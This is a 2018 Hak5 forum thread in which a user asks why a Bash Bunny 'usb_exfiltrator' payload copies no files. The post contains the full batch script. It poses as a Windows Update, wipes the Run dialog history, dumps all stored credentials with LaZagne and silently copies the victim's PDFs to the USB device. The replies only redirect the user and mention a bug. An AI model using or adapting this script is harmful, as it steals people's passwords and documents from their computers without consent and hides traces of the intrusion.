CuChulaind Posted September 18, 2018 Posted September 18, 2018 Hello, New to BB, and testing out some payloads. I have updated my BB, been able to connect serially, as well as share my network connection with the device on Windows (not so much with bb.sh using Arch) and able to ssh into the device as well. I have successfully run the notepad payload that creates the notepad file regarding locking you computer. I am unlucky with the usb_exfiltrator payload. I have installed the laZagne.exe, but I'm not so much concerned about the passwords right now. When I run the payload, I expect a new directory in loot to be created named the name of my hostname, as well as 1 pdf file in that directory. In my loot directory I also expect to see a password file. I did make a copy of the REM line that copies any .pdf file, and removed the /E flag (so as not to look in subdirectories) to keep it simple: xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul After running the payload (on my Win 10 machine), my loot directory contains a new directory named my victim hostname, however that directory is empty. A password file is also created in the loot directory, however it is empty. Among my files and directories in my Documents directory I do have 1 pdf, which I expected to be copied to the Bash Bunny loot directory under the created hostname directory. Suggestions / Corrections greatly appreciated! Thank you. Entire e.cmd file: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit
Rkiver Posted September 18, 2018 Posted September 18, 2018 Assume by BB you mean Bash Bunny right? Every item Hak5 makes, has it's own section of the forum. Best to ask in there. For you that's the Bash Bunny at https://forums.hak5.org/forum/92-bash-bunny/
CuChulaind Posted September 21, 2018 Author Posted September 21, 2018 Cool I found an ultra rare bug apparently.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.